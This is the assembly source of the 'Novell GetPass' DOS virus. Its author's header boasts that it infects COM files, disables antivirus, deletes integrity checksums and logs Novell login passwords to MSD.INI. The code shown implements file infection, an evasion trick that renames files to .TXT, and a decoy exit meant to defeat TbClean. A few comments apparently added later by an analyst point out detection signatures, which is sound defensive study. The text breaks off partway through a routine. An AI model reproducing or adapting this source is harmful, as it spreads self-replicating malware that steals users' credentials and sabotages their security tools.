;=============================================================================
; Please feel free to distribute, but do NOT change and say it's your's!
;=============================================================================
; You are now looking at the source code of the Novell GetPass virus!
; Stop doing so! But if you don't well, ok! The GetPass virus is fairly
; unique in some parts of its behaviour. It infects *.COM files using
; an infection interrupt routine.(INT D0) It first renames the files
; it infects to a *.TXT file to avoid heuristic alarms of some rule
; based TSR's and then restores the original extension. Some resident
; anti-viral products will be completely disabled in memory and their
; CRC check files will be deleted. The GetPass routine will become
; resident if the virus detects that NETX (Novell NetWare) is loaded
; in memory, hooking INT 16 (keyboard) and INT 21 in memory.
; The GetPass routine activates when LOGIN is executed. The users login
; name and his/her password will be captured and written to a file which
; will be created in C:\DOS.(the file is MSD.INI) If the file becomes
; approximately 8Kb, the virus deletes the file. This is to avoid a very large
; file in the DOS directory. A new file will be created and the logging
; will continue. Every first day of the month, when an infected program
; is executed the file containing the names/passwords is printed if there
; is a printer available. The virus does not infect COMMAND.COM.
;
; Greetings ,ThE wEiRd GeNiUs
;
; PS: Check your MSD.INI file once in a while!
;-----------------------------------------------------------------------------
; Assemble with TASM 2.0 or higher, Link with TLINK /T
;-----------------------------------------------------------------------------
CODE SEGMENT
ASSUME CS:CODE,DS:CODE,ES:CODE,SS:CODE
CRYPTLEN EQU CHKTIME-CSTART-1;Length to en/decrypt.
VIRLEN EQU BUFFER-VSTART ;Length of virus.
MINLEN EQU 1000 ;Min file length to infect.
MAXLEN EQU 0F230h ;Max " " " "
CR EQU 0Dh ;Return.
LF EQU 0Ah ;Line feed.
TAB EQU 09h ;Tab.
INTRO EQU LBIT-INAME ;
TSRLEN EQU LASTBYT-TSR ;Length of activation TSR.
TSR2LEN EQU NOTENC-INFECT+1;Length of infection Interrupt.
LENGTH EQU VAL_1-CSTART ;Length of encrypted code.
KBUFF EQU KEYBUFF-TSR ;\
KPTR EQU KEYPTR-TSR ;
FN EQU FNAME-TSR ;
LOGINL EQU LOGIN-TSR ;
KFLAG EQU KBFLAG-TSR ; Offsets in activation TSR.
INTOF EQU INT21-TSR ;
INT16L EQU INT16-TSR ;
OLD16L EQU NINT16-TSR ;
NINTOF EQU NINT21-TSR ;
COUCR EQU CCOUNT-TSR ;
PARLEN EQU PARAM-TSR ;/
ORG 0100h
.RADIX 16
;-----------------------------------------------------------------------------
; Infected dummy program. (Only in 1st run)
;-----------------------------------------------------------------------------
START: JMP VSTART ;Jump to virus code.
;-----------------------------------------------------------------------------
; Begin of the virus code.
;-----------------------------------------------------------------------------
VSTART: CALL CHKDOS ;-Confuse anti-viral progs.
CALL CHKTIME ;/
BEGIN: CALL ENCRYP ;Call decryption routine.
;-----------------------------------------------------------------------------
; From here the code will be encrypted.
;-----------------------------------------------------------------------------
CSTART: CALL BEGIN1 ;Same old trick.
CALL RESBEG ;Restore begin.
CALL CHKDRV ;Check drive & DOS version.
CALL SAVEDIR ;Save startup directory.
PUSH ES ;In the next sessions ES is modified.
CALL INT24 ;NoErrorAllowed.
CALL VSAFE ;Vsafe resident?
CALL ACTIVE ;Install password routine.
POP ES ;Restore extra segment.
CALL ENKEY ;Create new CRYPTKEY.
CALL INSTSR2 ;Place infection routine in memory.
CALL DTA ;Store old and give up new DTA addres.
CALL FIND1 ;Determine how many path's are present.
CALL RANDOM ;Random value for directory search.
CALL FIND2 ;Find suitable directory.
CALL CHDRIVE ;If it is on another drive.
CALL GODIR ;Go to the selected directory.
F_FIRST:MOV AH,4Eh ;Search for 1st *.COM
MOV CX,110b ;Look for read only, system & hidden.
LEA DX,[BP+OFFSET SPEC] ;Offset file specification.(*.COM)
INT 21h ;Call DOS.
JNC OPENF ;Exit if no file found.
CALL EXIT1 ;No files found, quit.
OPENF: CALL CHKCOM ;-Is it COMMAND.COM?
CMP CX,00h ;/
JE LETSGO ;Yes, do NOT infect.
CALL CHKINF ;Already infected?
CALL ATTRIB ;Ask & clear file attributes.
CALL RENAME ;Rename to *.TXT file.
MOV AH,4Eh ;Search the name.TXT file.
MOV CX,110b ;Read only, system & hidden.
LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
INT 21h ;Call DOS.
MOV AX,3D02h ;Open file with read and write access.
LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
INT 21h ;Call DOS.
MOV BYTE PTR[BP+OFFSET HANDLE],AL;Save file handle.
CALL STIME ;Save file date & time.
CHECK: MOV AH,3Fh ;Read begin of victim.
MOV CX,3 ;Read Begin.
LEA DX,[BP+OFFSET ORIGNL] ;Into offset original instructions.
INT 21h ;Call DOS.
JC CLOSE ;On error, quit.
REPLACE:CALL BPOINT ;Move file pointer to end of victim.
SUB AX,3 ;Calculate new jump.
MOV WORD PTR[BP+NEWJMP+1],AX;Store new jump value.
MOV AX,4200h ;Move file pointer to begin.
XOR CX,CX ;Zero high nybble.
XOR DX,DX ;Zero low nybble.
INT 21h ;Call DOS.
MOV AH,40h ;Write to file,
MOV CX,3 ;3 Bytes.
LEA DX,[BP+OFFSET NEWJMP] ;Offset new jump value.
INT 21h ;Call DOS.
CALL BPOINT ;Move file pointer to end.
JMP INFEC ;Create encryption key.
LETSGO: MOV AH,4Fh ;Find next.
INT 21h ;Call DOS.
JC EXIT ;On error, quit.
JMP OPENF ;Open new victim.
INFEC: MOV DL,[BP+OFFSET VAL_1] ;Encryption value into DL.
INT 0D0h ;Neat way to infect a file!
CLOSE: CALL RTIME ;Restore File time & date.
MOV AH,3Eh ;Close file.
INT 21h ;Call DOS.
CALL RENAME2 ;Restore back to COM file.
CALL RATTRIB ;Restore File attributes.
;-----------------------------------------------------------------------------
EXIT: CALL DELSTUF ;Delete CRC checkers.
EXIT1: MOV AH,1Ah ;Restore old DTA.
MOV DX,[BP+OFFSET OLD_DTA] ;Old DTA address.
INT 21h ;Call DOS.
EXIT2: MOV AH,0Eh ;Restore startup drive.
MOV DL,BYTE PTR[BP+OFFSET OLDRV];Old drive code.
INT 21h ;Call DOS.
MOV AH,3Bh ;Goto startup directory,
LEA DX,[BP+OFFSET BUFFER] ;that is stored here.
INT 21h ;Call DOS.
EXIT3: CALL RINT24 ;Restore original INT 24
EXIT4: MOV AX,100h ;
PUSH AX ;
RET ;Pass control to HOST.
;-----------------------------------------------------------------------------
;-- Analyst note: anti-cleaning decoy. CHKDRV branches here when CHKDOS
;   reports AL < 1 (CHKDOS itself is outside this excerpt; presumably an
;   emulation/cleaner environment - confirm). Instead of restoring the saved
;   ORIGNL bytes (see RESBEG), it copies the 3 bytes at DEXIT (described by
;   the author as a program-terminating interrupt; DEXIT is not in this
;   excerpt) over the host entry at CS:0100h and returns into it. A cleaner
;   that reconstructs the host by emulating up to this return captures the
;   decoy, not the original entry point; recover from the ORIGNL copy instead.
DUMEX: MOV DI,0100h ;This is a dummy exit, it screws up
LEA SI,[BP+DEXIT] ;TbClean. In stead of cleaning the
MOV CX,3 ;phile, it puts a program terminating
REPNZ MOVSB ;interrupt in the beginning of the
MOV AX,0100h ;victim, neat huh!
PUSH AX ;
RET ;
;-----------------------------------------------------------------------------
BETWEEN:MOV AH,3Eh ;Close the file. (shared skip path: close, then find next)
INT 21h ;Call DOS
JMP LETSGO ;Find next file.
;-- Analyst note: CHKINF is the infection-marker and size gate.
;   Marker: a single byte 43h ('C') at EOF-3 of the candidate; an integrity
;   scanner can reuse the same offset/value, together with the MINLEN/MAXLEN
;   window, to triage *.COM files for this family (alongside the MSD.INI
;   artefact named in the header). Already-marked files and files outside
;   the window leave via BETWEEN.
;   In:  [BP+NP] -> ASCIIZ name of the current FindFirst/FindNext hit.
;   Out: file closed; AX = low word of the file size as left by BPOINT
;        (BPOINT is outside this excerpt - presumably an lseek to EOF).
CHKINF: MOV AX,3D00h ;Open file with only read acces.
MOV DX,WORD PTR[BP+OFFSET NP];Offset filename.
INT 21h ;Call DOS.
MOV BX,AX ;File handle into BX.
MOV CX,0FFFFh ;- Move -3 into CX,DX.
MOV DX,0FFFCh ;/
MOV AX,4202h ;Move file pointer to end-3
INT 21h ;Call DOS.
MOV AH,3Fh ;Read file.
MOV CX,01h ;One Byte.
LEA DX,[BP+OFFSET MARK1] ;Into this address.
INT 21h ;Call DOS.
CMP BYTE PTR [BP+OFFSET MARK1],43h; Is it infected? (family marker byte)
JE BETWEEN ;Yes, find another.
CALL BPOINT ;Go to EOF.
CMP AX,MAXLEN ;Is the file to long?
JNB BETWEEN ;Yes, find another.
CMP AX,MINLEN ;Is it to short?
JBE BETWEEN ;Yes, find another.
MOV AH,3Eh ;Close the file.
INT 21h ;Call DOS
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKDRV: CALL CHKDOS ;Check DOS version.
CMP AL,01 ;
JB DUMEX ;Screw up TbClean.
CMP AL,05h ;Is it DOS 5.0 or higher?
JNGE EXIT4 ;No, exit.
MOV AH,19h ;Get drive code.
INT 21h ;Call DOS.
MOV BYTE PTR[BP+OFFSET OLDRV],AL;Save old drive code.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RESBEG: LEA SI,[BP+OFFSET ORIGNL] ;Offset original begin.
MOV DI,0100h ;Restore original instructions.
MOV CX,3 ;Restore 3 bytes.
REPNZ MOVSB ;Move them.
RET ;Return to caller.
;-----------------------------------------------------------------------------
CHKCOM: MOV CX,05 ;CX=len COMMAND.
MOV DI,[BP+OFFSET NP] ;Offset found file.
LEA SI,[BP+OFFSET COMMND] ;Offset COMMAND.
REPZ CMPSB ;Compare the strings.
RET ;Return to caller.
;-----------------------------------------------------------------------------
;-- Analyst note: extension-swap evasion. The approved victim is renamed to
;   *.TXT here before any write, and RENAME2 renames it back to *.COM after
;   the write, so a behaviour monitor that only guards writes to *.COM/*.EXE
;   sees a write to a text file. Detection: a rename to .TXT, an open for
;   write, and a rename back to .COM on the same path in quick succession is
;   a strong signal; guard on file content/header rather than on extension.
;   Side effect: [BP+TXTPOI] receives the address of the '.' in NEWNAM so
;   RENAME2 can patch the extension back in place.
RENAME: MOV CX,0Ch ; This section renames the
MOV SI,WORD PTR[BP+OFFSET NP]; found and approved for
LEA DI,WORD PTR[BP+OFFSET NEWNAM]; infection file to a
REPNZ MOVSB ; *.TXT file. The reason for
LEA BX,WORD PTR[BP+OFFSET NEWNAM-1];this is that VPROTECT from
LPOINT: INC BX ; Intel has a rule based NLM.
CMP BYTE PTR[BX],'.' ; If we write to a COM file
JNE LPOINT ; VPROTECT gives an alarm
MOV DI,BX ; message. However, if we
MOV WORD PTR[BP+OFFSET TXTPOI],BX; write to a text file....
LEA SI,[BP+OFFSET TXT] ; Pretty solution isn't it?
MOVSW ;
MOVSW ;
MOV DX,WORD PTR[BP+OFFSET NP];
LEA DI,WORD PTR[BP+OFFSET NEWNAM];
MOV AH,56h ;Rename file function.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RENAME2:LEA SI,[BP+OFFSET SPEC+1] ; In this section we
MOV DI,WORD PTR[BP+OFFSET TXTPOI]; give the infected file
MOVSW ; its old extention back.
MOVSW ; (*.COM)
MOV DX,WORD PTR[BP+OFFSET NP];
LEA DI,WORD PTR[BP+OFFSET NEWNAM];
MOV AH,56h ;Rename file function.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
ENKEY: CALL CHKTIME ;Get time.
MOV BYTE PTR[BP+OFFSET VAL_1],DL;New encryption key.
RET ;Return to caller.
;-----------------------------------------------------------------------------
SAVEDIR:MOV BYTE PTR[BP+OFFSET BUFFER],5Ch;Put a slash in DTA.
MOV DL,BYTE PTR[BP+OFFSET OLDRV];Drive code.
INC DL ;DL+1 because functions differ.
MOV AH,47h ;Get current directory.
LEA SI,[BP+OFFSET BUFFER+1] ;Store current directory.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
DTA: MOV AH,2Fh ;Get DTA address.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET OLD_DTA],BX; Save here.
LEA DX,[BP+OFFSET NEW_DTA] ;Offset new DTA address.
MOV AH,1Ah ;Give up new DTA.
INT 21 ;Call DOS.
ADD DX,1Eh ;Filename pointer in DTA.
MOV WORD PTR[BP+OFFSET NP],DX;Put in name pointer.
RET ;Return to caller.
;-----------------------------------------------------------------------------
INT24: MOV AX,3524h ;Get int 24 handler.
INT 21h ;into [ES:BX].